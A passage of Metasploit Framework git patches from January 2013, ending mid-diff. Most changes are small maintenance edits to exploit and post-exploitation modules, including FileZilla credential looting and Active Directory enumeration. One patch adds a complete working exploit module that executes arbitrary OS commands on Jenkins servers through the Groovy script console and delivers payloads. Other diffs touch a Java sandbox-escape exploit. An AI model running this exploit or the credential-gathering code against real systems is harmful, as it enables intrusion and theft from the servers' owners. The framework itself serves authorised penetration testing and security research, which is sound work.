--- a/external/source/exploits/cve-2012-5088/Exploit.java +++ b/external/source/exploits/cve-2012-5088/Exploit.java @@ -35,11 +35,11 @@ public void init() // convert it to a simple byte array buffer = bos.toByteArray(); - MethodHandles.Lookup localLookup = MethodHandles.publicLookup(); - MethodType localMethodType0 = MethodType.methodType(Class.class, String.class); - MethodHandle localMethodHandle0 = localLookup.findStatic(Class.class, "forName", localMethodType0); - Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" }); - Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" }); + MethodHandles.Lookup localLookup = MethodHandles.publicLookup(); + MethodType localMethodType0 = MethodType.methodType(Class.class, String.class); + MethodHandle localMethodHandle0 = localLookup.findStatic(Class.class, "forName", localMethodType0); + Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" }); + Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" }); MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class }); MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1); MethodType localMethodType2 = MethodType.methodType(Void.TYPE); diff --git a/modules/exploits/multi/browser/java_jre17_method_handle.rb b/modules/exploits/multi/browser/java_jre17_method_handle.rb index 89fd3db6fb7d..623bc31c8e22 100644 --- a/modules/exploits/multi/browser/java_jre17_method_handle.rb +++ b/modules/exploits/multi/browser/java_jre17_method_handle.rb @@ -41,7 +41,7 @@ def initialize( info = {} ) [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], - 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Payload' => { 'Space' => 20480, 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', @@ -70,7 +70,7 @@ def initialize( info = {} ) ], ], 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jan 10 2013' + 'DisclosureDate' => 'Oct 16 2012' )) end From 892899acd5733ac560a244b96ab95a2de40d8a8b Mon Sep 17 00:00:00 2001 From: Charles Smith Date: Thu, 17 Jan 2013 16:52:02 -0500 Subject: [PATCH 060/421] Fixed loot formatting so data is under the proper column The credentials table was defined with the columns "User", "Password", "Host", "Port", and "SSL". Credentials were not added in that order, however. They were added in the order "host, port, user, password, ssl" in this line: credentials << [cred['host'], cred['port'], cred['user'], cred['password'], cred['ssl']] I changed the order the columns were defined to fix this. The permissions table had a similar issue. The "FileWrite" column was missing, so I added it. I also moved the "Home" column to after the "AutoCreate" column. Now the line: permissions << [perm['host'], perm['user'], perm['dir'], perm['fileread'], perm['filewrite'], perm['filedelete'], perm['fileappend'],perm['dircreate'], perm['dirdelete'], perm['dirlist'], perm['dirsubdirs'], perm['autocreate']] works correctly. --- .../post/windows/gather/credentials/filezilla_server.rb | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index a21ea3f81283..66da9f2113a0 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -89,10 +89,10 @@ def get_filezilla_creds(paths) 'Indent' => 1, 'Columns' => [ - "User", - "Password", "Host", "Port", + "User", + "Password", "SSL" ]) @@ -105,14 +105,15 @@ def get_filezilla_creds(paths) "User", "Dir", "FileRead", + "FileWrite", "FileDelete", "FileAppend", "DirCreate", "DirDelete", "DirList", "DirSubdirs", - "Home", - "AutoCreate" + "AutoCreate", + "Home" ]) configuration = Rex::Ui::Text::Table.new( From e613c860a500ff4f37f5f315e750f517b4c0da20 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Thu, 17 Jan 2013 23:17:14 +0100 Subject: [PATCH 061/421] Added Name and Emailadress --- modules/auxiliary/scanner/http/wordpress_pingback_access.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb index 83dde3257ea1..368cb189564e 100644 --- a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb +++ b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb @@ -24,7 +24,7 @@ def initialize(info = {}) [ 'Thomas McCarthy "smilingraccoon" ', 'Brandon McCann "zeknox" ' , - 'FireFart' # Original PoC + 'Christian Mehlmauer "FireFart" ' # Original PoC ], 'License' => MSF_LICENSE, 'References' => From 3465aa00bd10d42391810dab49c6a91e85bc55b8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 18 Jan 2013 18:42:27 +0100 Subject: [PATCH 062/421] title updated --- .../browser/java_jre17_glassfish_averagerangestatisticimpl.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb index 72e5c67f3672..bae9abf58a4e 100644 --- a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb +++ b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize( info = {} ) super( update_info( info, - 'Name' => 'Java Applet JMX Remote Code Execution', + 'Name' => 'Java Applet AverageRangeStatisticImpl Remote Code Execution', 'Description' => %q{ This module abuses the AverageRangeStatisticImpl from a Java Applet to run arbitrary Java code outside of the sandbox, a different exploit vector than the one From 9f7aafccdfeda0deed1f4252b9da02067d64937f Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Fri, 18 Jan 2013 14:56:52 -0500 Subject: [PATCH 063/421] add module to execute commands via Jenkins Script Console --- .../multi/http/jenkins_script_console.rb | 146 ++++++++++++++++++ 1 file changed, 146 insertions(+) create mode 100644 modules/exploits/multi/http/jenkins_script_console.rb diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb new file mode 100644 index 000000000000..bd4614cfc6aa --- /dev/null +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -0,0 +1,146 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStagerVBS + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Jenkins Script-Console Java Execution', + 'Description' => %q{ + This module uses the Jenkins Groovy script console to execute + OS commands using Java. + }, + 'Author' => + [ + 'Spencer McIntyre', + 'jamcut' + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: $', + 'DefaultOptions' => + { + 'WfsDelay' => '10', + }, + 'References' => + [ + ['URL', 'https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console'] + ], + 'Targets' => + [ + ['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win'}], + ['Unix', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}], + ], + 'DisclosureDate' => 'Jan 18 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]), + OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]), + OptString.new('PATH', [ true, 'The path to jenkins', '/jenkins' ]), + ], self.class) + end + + def check + res = send_request_cgi({'uri' => "#{datastore['PATH']}/login"}) + if res and res.headers.include?('X-Jenkins') + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + def http_send_command(cmd, opts = {}) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => datastore['PATH'] + '/script', + 'cookie' => @cookie, + 'vars_post' => + { + 'script' => java_craft_runtime_exec(cmd), + 'Submit' => 'Run' + } + }) + if not (res and res.code == 200) + fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.') + end + end + + def java_craft_runtime_exec(cmd) + decoder = Rex::Text.rand_text_alpha(5, 8) + decoded_bytes = Rex::Text.rand_text_alpha(5, 8) + cmd_array = Rex::Text.rand_text_alpha(5, 8) + jcode = "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n" + jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n" + + jcode << "String [] #{cmd_array} = new String[3];\n" + if target['Platform'] == 'win' + jcode << "#{cmd_array}[0] = \"cmd.exe\";\n" + jcode << "#{cmd_array}[1] = \"/c\";\n" + else + jcode << "#{cmd_array}[0] = \"/bin/sh\";\n" + jcode << "#{cmd_array}[1] = \"-c\";\n" + end + jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n" + jcode << "Runtime.getRuntime().exec(#{cmd_array});\n" + jcode + end + + def execute_command(cmd, opts = {}) + http_send_command("#{cmd}") + end + + def exploit + print_status('Checking access to the script console') + res = send_request_cgi({'uri' => "#{datastore['PATH']}/script"}) + if not (res and res.code) + fail_with(Exploit::Failure::Unknown) + end + + sessionid = 'JSESSIONID=' << res.headers['set-cookie'].split('JSESSIONID=')[1].split('; ')[0] + @cookie = "#{sessionid}" + + if res.code != 200 + print_status('Logging in...') + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => datastore['PATH'] + '/j_acegi_security_check', + 'cookie' => @cookie, + 'vars_post' => + { + 'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'), + 'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'), + 'Submit' => 'log in' + } + }) + + if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/ + fail_with(Exploit::Failure::NoAccess, 'login failed') + end + else + print_status('No authentication required, skipping login...') + end + + case target['Platform'] + when 'win' + print_status("#{rhost}:#{rport} - Sending VBS stager...") + execute_cmdstager({:linemax => 2049}) + + when 'unix' + print_status("#{rhost}:#{rport} - Sending payload...") + http_send_command("#{payload.encoded}") + end + + handler + end +end From bfd58e95707dcfc8e2ad9a661ba94bb0fb2fe443 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Fri, 18 Jan 2013 14:59:41 -0600 Subject: [PATCH 064/421] Add a comment doc for future parser writers --- lib/rex/parser/unattend.rb | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/lib/rex/parser/unattend.rb b/lib/rex/parser/unattend.rb index f760410c3fdf..09989418a25e 100644 --- a/lib/rex/parser/unattend.rb +++ b/lib/rex/parser/unattend.rb @@ -3,6 +3,12 @@ module Rex module Parser + +# This is a parser for the Windows Unattended Answer File +# format. It's used by modules/post/windows/gather/enum_unattend.rb +# and uses REXML (as opposed to Nokogiri) for its XML parsing. +# See: http://technet.microsoft.com/en-us/library/ff715801 +# http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx class Unattend def self.parse(xml) From 9f42abdb9545f340ae8e1dd1d9bd749cdddfa997 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Fri, 18 Jan 2013 15:44:52 -0600 Subject: [PATCH 065/421] Whitespace fixup --- .../ui/console/command_dispatcher/stdapi/sys.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 6c05cb89c059..782a206a3fbb 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -38,14 +38,14 @@ class Console::CommandDispatcher::Stdapi::Sys # @@reboot_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu." ], - "-f" => [ true, "Force a reboot, valid values [1|2]" ]) + "-f" => [ true, "Force a reboot, valid values [1|2]" ]) # # Options used by the 'shutdown' command. # @@shutdown_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu." ], - "-f" => [ true, "Force a shutdown, valid values [1|2]" ]) + "-f" => [ true, "Force a shutdown, valid values [1|2]" ]) # # Options used by the 'reg' command. @@ -330,7 +330,7 @@ def cmd_kill_help # @param pids [Array] The pids to validate # @param allow_pid_0 [Boolean] whether to consider a pid of 0 as valid # @param allow_session_pid [Boolean] whether to consider a pid = the current session pid as valid - # @return [Array] Returns an array of valid pids + # @return [Array] Returns an array of valid pids def validate_pids(pids, allow_pid_0 = false, allow_session_pid = false) @@ -797,7 +797,7 @@ def cmd_suspend(*args) return true end - continue = args.delete("-c") || false + continue = args.delete("-c") || false resume = args.delete("-r") || false # validate all the proposed pids first so we can bail if one is bogus From 4ee80e76bdffcfd4ce9decb7c64c3941bb5d9e01 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Sat, 19 Jan 2013 23:15:20 +0000 Subject: [PATCH 066/421] msftidy wldap32 --- .../stdapi/railgun/def/def_wldap32.rb | 208 +++++++++--------- 1 file changed, 104 insertions(+), 104 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb index 93a26496ee0f..9dae48a0a89d 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb @@ -1,104 +1,104 @@ -# -*- coding: binary -*- -module Rex -module Post -module Meterpreter -module Extensions -module Stdapi -module Railgun -module Def - -class Def_wldap32 - - def self.create_dll(dll_path = 'wldap32') - dll = DLL.new(dll_path, ApiConstants.manager) - - dll.add_function('ldap_sslinitA', 'DWORD',[ - ['PCHAR', 'HostName', 'in'], - ['DWORD', 'PortNumber', 'in'], - ['DWORD', 'secure', 'in'] - ]) - - dll.add_function('ldap_bind_sA', 'DWORD',[ - ['DWORD', 'ld', 'in'], - ['PCHAR', 'dn', 'in'], - ['PCHAR', 'cred', 'in'], - ['DWORD', 'method', 'in'] - ]) - - dll.add_function('ldap_search_sA', 'DWORD',[ - ['DWORD', 'ld', 'in'], - ['PCHAR', 'base', 'in'], - ['DWORD', 'scope', 'in'], - ['PCHAR', 'filter', 'in'], - ['PCHAR', 'attrs[]', 'in'], - ['DWORD', 'attrsonly', 'in'], - ['PDWORD', 'res', 'out'] - ]) - - dll.add_function('ldap_count_entries', 'DWORD',[ - ['DWORD', 'ld', 'in'], - ['DWORD', 'res', 'in'] - ]) - dll.add_function('ldap_first_entry', 'DWORD',[ - ['DWORD', 'ld', 'in'], - ['DWORD', 'res', 'in'] - ]) - - dll.add_function('ldap_next_entry', 'DWORD',[ - ['DWORD', 'ld', 'in'], - ['DWORD', 'entry', 'in'] - ]) - - dll.add_function('ldap_first_attributeA', 'DWORD',[ - ['DWORD', 'ld', 'in'], - ['DWORD', 'entry', 'in'], - ['DWORD', 'ptr', 'in'] - ]) - - dll.add_function('ldap_next_attributeA', 'DWORD',[ - ['DWORD', 'ld', 'in'], - ['DWORD', 'entry', 'in'], - ['DWORD', 'ptr', 'inout'] - ]) - - dll.add_function('ldap_count_values', 'DWORD',[ - ['DWORD', 'vals', 'in'], - ]) - - dll.add_function('ldap_get_values', 'DWORD',[ - ['DWORD', 'ld', 'in'], - ['DWORD', 'entry', 'in'], - ['PCHAR', 'attr', 'in'] - ]) - - dll.add_function('ldap_value_free', 'DWORD',[ - ['DWORD', 'vals', 'in'], - ]) - - dll.add_function('ldap_memfree', 'VOID',[ - ['DWORD', 'block', 'in'], - ]) - - dll.add_function('ber_free', 'VOID',[ - ['DWORD', 'pBerElement', 'in'], - ['DWORD', 'fbuf', 'in'], - ]) - - dll.add_function('LdapGetLastError', 'DWORD',[]) - - dll.add_function('ldap_err2string', 'DWORD',[ - ['DWORD', 'err', 'in'] - ]) - - dll.add_function('ldap_msgfree', 'DWORD', [ - ['DWORD', 'res', 'in'] - ]) - - return dll - end - -end - -end; end; end; end; end; end; end - - +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Stdapi +module Railgun +module Def + +class Def_wldap32 + + def self.create_dll(dll_path = 'wldap32') + dll = DLL.new(dll_path, ApiConstants.manager) + + dll.add_function('ldap_sslinitA', 'DWORD',[ + ['PCHAR', 'HostName', 'in'], + ['DWORD', 'PortNumber', 'in'], + ['DWORD', 'secure', 'in'] + ]) + + dll.add_function('ldap_bind_sA', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['PCHAR', 'dn', 'in'], + ['PCHAR', 'cred', 'in'], + ['DWORD', 'method', 'in'] + ]) + + dll.add_function('ldap_search_sA', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['PCHAR', 'base', 'in'], + ['DWORD', 'scope', 'in'], + ['PCHAR', 'filter', 'in'], + ['PCHAR', 'attrs[]', 'in'], + ['DWORD', 'attrsonly', 'in'], + ['PDWORD', 'res', 'out'] + ]) + + dll.add_function('ldap_count_entries', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'res', 'in'] + ]) + dll.add_function('ldap_first_entry', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'res', 'in'] + ]) + + dll.add_function('ldap_next_entry', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'entry', 'in'] + ]) + + dll.add_function('ldap_first_attributeA', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'entry', 'in'], + ['DWORD', 'ptr', 'in'] + ]) + + dll.add_function('ldap_next_attributeA', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'entry', 'in'], + ['DWORD', 'ptr', 'inout'] + ]) + + dll.add_function('ldap_count_values', 'DWORD',[ + ['DWORD', 'vals', 'in'], + ]) + + dll.add_function('ldap_get_values', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'entry', 'in'], + ['PCHAR', 'attr', 'in'] + ]) + + dll.add_function('ldap_value_free', 'DWORD',[ + ['DWORD', 'vals', 'in'], + ]) + + dll.add_function('ldap_memfree', 'VOID',[ + ['DWORD', 'block', 'in'], + ]) + + dll.add_function('ber_free', 'VOID',[ + ['DWORD', 'pBerElement', 'in'], + ['DWORD', 'fbuf', 'in'], + ]) + + dll.add_function('LdapGetLastError', 'DWORD',[]) + + dll.add_function('ldap_err2string', 'DWORD',[ + ['DWORD', 'err', 'in'] + ]) + + dll.add_function('ldap_msgfree', 'DWORD', [ + ['DWORD', 'res', 'in'] + ]) + + return dll + end + +end + +end; end; end; end; end; end; end + + From 771baa3181f71bdb077bd4de5105b8c2649ded82 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Sat, 19 Jan 2013 23:23:45 +0000 Subject: [PATCH 067/421] Added x64 check and options to info --- .../post/windows/gather/enum_ad_computers.rb | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index caf0278fd2cf..65bd062e4b2c 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -18,6 +18,18 @@ def initialize(info={}) 'Name' => 'Windows Gather AD Enumerate Computers', 'Description' => %q{ This module will enumerate computers in the default AD directory. + + Optional Attributes: + objectClass, cn, description, distinguishedName, instanceType, whenCreated, + whenChanged, uSNCreated, uSNChanged, name, objectGUID, + userAccountControl, badPwdCount, codePage, countryCode, + badPasswordTime, lastLogoff, lastLogon, localPolicyFlags, + pwdLastSet, primaryGroupID, objectSid, accountExpires, + logonCount, sAMAccountName, sAMAccountType, operatingSystem, + operatingSystemVersion, operatingSystemServicePack, serverReferenceBL, + dNSHostName, rIDSetPreferences, servicePrincipalName, objectCategory, + netbootSCPBL, isCriticalSystemObject, frsComputerReferenceBL, + lastLogonTimestamp, msDS-SupportedEncryptionTypes }, 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell ' ], @@ -39,6 +51,11 @@ def read_value(addr) end def run + if sysinfo["Architecture"] =~ /x64/i + print_error("Does not work in x64 see: http://dev.metasploit.com/redmine/issues/7639"); + return + end + print_status("Connecting to default LDAP server") session_handle = bind_default_ldap_server From 6b40011a6f2e9f0d47264b03eb5d528378010e4c Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Sat, 19 Jan 2013 19:10:56 -0500 Subject: [PATCH 068/421] use target_uri and normalize_uri as well as fix a cookie problem --- .../multi/http/jenkins_script_console.rb | 39 ++++++++++--------- 1 file changed, 21 insertions(+), 18 deletions(-) diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index bd4614cfc6aa..1033999726bb 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -26,7 +26,6 @@ def initialize(info = {}) 'jamcut' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: $', 'DefaultOptions' => { 'WfsDelay' => '10', @@ -45,14 +44,17 @@ def initialize(info = {}) register_options( [ - OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]), - OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]), - OptString.new('PATH', [ true, 'The path to jenkins', '/jenkins' ]), + OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]), + OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]), + OptString.new('TARGETURI', [ true, 'The path to jenkins', '/jenkins/' ]), ], self.class) end def check - res = send_request_cgi({'uri' => "#{datastore['PATH']}/login"}) + uri = target_uri + uri.path = normalize_uri(uri.path) + uri.path << "/" if uri.path[-1, 1] != "/" + res = send_request_cgi({'uri' => "#{uri.path}login"}) if res and res.headers.include?('X-Jenkins') return Exploit::CheckCode::Detected else @@ -61,16 +63,17 @@ def check end def http_send_command(cmd, opts = {}) - res = send_request_cgi({ + request_parameters = { 'method' => 'POST', - 'uri' => datastore['PATH'] + '/script', - 'cookie' => @cookie, + 'uri' => "#{@uri.path}script", 'vars_post' => { 'script' => java_craft_runtime_exec(cmd), 'Submit' => 'Run' } - }) + } + request_parameters['cookie'] = @cookie if @cookie != nil + res = send_request_cgi(request_parameters) if not (res and res.code == 200) fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.') end @@ -101,21 +104,19 @@ def execute_command(cmd, opts = {}) end def exploit + @uri = target_uri + @uri.path = normalize_uri(@uri.path) + @uri.path << "/" if @uri.path[-1, 1] != "/" print_status('Checking access to the script console') - res = send_request_cgi({'uri' => "#{datastore['PATH']}/script"}) - if not (res and res.code) - fail_with(Exploit::Failure::Unknown) - end - - sessionid = 'JSESSIONID=' << res.headers['set-cookie'].split('JSESSIONID=')[1].split('; ')[0] - @cookie = "#{sessionid}" + res = send_request_cgi({'uri' => "#{@uri.path}script"}) + fail_with(Exploit::Failure::Unknown) if not res + @cookie = nil if res.code != 200 print_status('Logging in...') res = send_request_cgi({ 'method' => 'POST', - 'uri' => datastore['PATH'] + '/j_acegi_security_check', - 'cookie' => @cookie, + 'uri' => "#{@uri.path}j_acegi_security_check", 'vars_post' => { 'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'), @@ -127,6 +128,8 @@ def exploit if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/ fail_with(Exploit::Failure::NoAccess, 'login failed') end + sessionid = 'JSESSIONID' << res.headers['set-cookie'].split('JSESSIONID')[1].split('; ')[0] + @cookie = "#{sessionid}" else print_status('No authentication required, skipping login...') end From 567185ec6583c69c0c6aa82f846b6abab93c4539 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Sun, 20 Jan 2013 00:19:17 +0000 Subject: [PATCH 069/421] Better cleanup and address comments --- .../stdapi/railgun/def/def_wldap32.rb | 3 + .../post/windows/gather/enum_ad_computers.rb | 64 +++++++++++-------- 2 files changed, 40 insertions(+), 27 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb index 9dae48a0a89d..6716b24f95a5 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb @@ -94,6 +94,9 @@ def self.create_dll(dll_path = 'wldap32') ['DWORD', 'res', 'in'] ]) + dll.add_function('ldap_unbind', 'DWORD', [ + ['DWORD', 'ld', 'in'] + ]) return dll end diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 65bd062e4b2c..3c923875a9cc 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -51,39 +51,32 @@ def read_value(addr) end def run - if sysinfo["Architecture"] =~ /x64/i - print_error("Does not work in x64 see: http://dev.metasploit.com/redmine/issues/7639"); + unless session.platform == "x64/win64" + print_error("Does not work in x86 see: http://dev.metasploit.com/redmine/issues/7639"); return end print_status("Connecting to default LDAP server") session_handle = bind_default_ldap_server - if session_handle == 0 - return - end + return false unless session_handle print_status("Querying default naming context") - defaultNamingContext = query_ldap(session_handle, "", 0, "(objectClass=computer)", ["defaultNamingContext"])[0]['attributes'][0]['values'] + + query_result = query_ldap(session_handle, "", 0, "(objectClass=computer)", ["defaultNamingContext"]) + first_entry_attributes = query_result[0]['attributes'] + defaultNamingContext = first_entry_attributes[0]['values'] # Value from First Attribute of First Entry + print_status("Default Naming Context #{defaultNamingContext}") attributes = datastore['ATTRIBS'].split(',') - #attributes = [ 'objectClass','cn', 'description', 'distinguishedName','instanceType','whenCreated', - # 'whenChanged','uSNCreated','uSNChanged','name','objectGUID', - # 'userAccountControl','badPwdCount','codePage','countryCode', - # 'badPasswordTime','lastLogoff','lastLogon','localPolicyFlags', - # 'pwdLastSet','primaryGroupID','objectSid','accountExpires', - # 'logonCount','sAMAccountName','sAMAccountType','operatingSystem', - # 'operatingSystemVersion','operatingSystemServicePack','serverReferenceBL', - # 'dNSHostName','rIDSetPreferences','servicePrincipalName','objectCategory', - # 'netbootSCPBL','isCriticalSystemObject','frsComputerReferenceBL', - # 'lastLogonTimestamp','msDS-SupportedEncryptionTypes' - # ] - print_status("Querying computer objects - Please wait...") results = query_ldap(session_handle, defaultNamingContext, 2, "(objectClass=computer)", attributes) + print_status("Unbinding from LDAP service.") + wldap32.ldap_unbind(session_handle) + results_table = Rex::Ui::Text::Table.new( 'Header' => 'AD Computers', 'Indent' => 1, @@ -108,7 +101,7 @@ def run print_line results_table.to_s if datastore['STORE'] - stored_path = store_loot('ad.computers', 'text/plain', session, results_table.to_s) + stored_path = store_loot('ad.computers', 'text/plain', session, results_table.to_csv) print_status("Results saved to: #{stored_path}") end end @@ -124,15 +117,17 @@ def bind_default_ldap_server if session_handle == 0 print_error("Unable to connect to LDAP server") - return 0 + wldap32.ldap_unbind(session_handle) + return false end vprint_status ("Binding to LDAP server.") - bind = wldap32.ldap_bind_sA(session_handle, nil, nil, 0x0486)['return'] #LDAP_AUTH_NEGOTIATE + bind = wldap32.ldap_bind_sA(session_handle, nil, nil, 0x0486)['return'] #LDAP_AUTH_NEGOTIATE 0x0486 if bind != 0 print_error("Unable to bind to LDAP server") - return 0 + wldap32.ldap_unbind(session_handle) + return false end return session_handle @@ -150,6 +145,13 @@ def query_ldap(session_handle, base, scope, filter, attributes) end search_count = wldap32.ldap_count_entries(session_handle, search['res'])['return'] + + if(search_count == 0) + print_error("No entries retrieved") + wldap32.ldap_msgfree(search['res']) + return + end + print_status("Entries retrieved: #{search_count}") vprint_status("Retrieving results...") @@ -163,15 +165,22 @@ def query_ldap(session_handle, base, scope, filter, attributes) max_search = [datastore['MAX_SEARCH'], search_count].min end - # user definied limit on entries to search? - for i in 0..(max_search-1) + 0.upto(max_search - 1) do |i| print '.' - if i==0 - entries[i] = wldap32.ldap_first_entry(session_handle, search['res'])['return'] + if(i==0) + entries[0] = wldap32.ldap_first_entry(session_handle, search['res'])['return'] else entries[i] = wldap32.ldap_next_entry(session_handle, entries[i-1])['return'] end + + if(entries[i] == 0) + print_error("Failed to get entry.") + wldap32.ldap_unbind(session_handle) + wldap32.ldap_msgfree(search['res']) + return + end + vprint_status("Entry #{i}: #{entries[i]}") attribute_results = [] @@ -191,7 +200,7 @@ def query_ldap(session_handle, base, scope, filter, attributes) if count < 1 vprint_error("Bad Value List") else - for j in 0..(count-1) + 0.upto(count - 1) do |j| p_value = client.railgun.memread(pp_value+(j*4), 4).unpack('V*')[0] vprint_status "p_value: 0x#{p_value.to_s(16)}" value = read_value(p_value) @@ -209,6 +218,7 @@ def query_ldap(session_handle, base, scope, filter, attributes) if pp_value != 0 vprint_status("Free value memory.") wldap32.ldap_value_free(pp_value) + # wldap32.ldap_memfree(attr) No need to free attributes as these are hardcoded end attribute_results << {"name" => attr, "values" => value_results} From dcaf2abc53b92537236c2ade043f198c966b4099 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Sun, 20 Jan 2013 00:22:30 +0000 Subject: [PATCH 070/421] Better feedback for x86 --- modules/post/windows/gather/enum_ad_computers.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 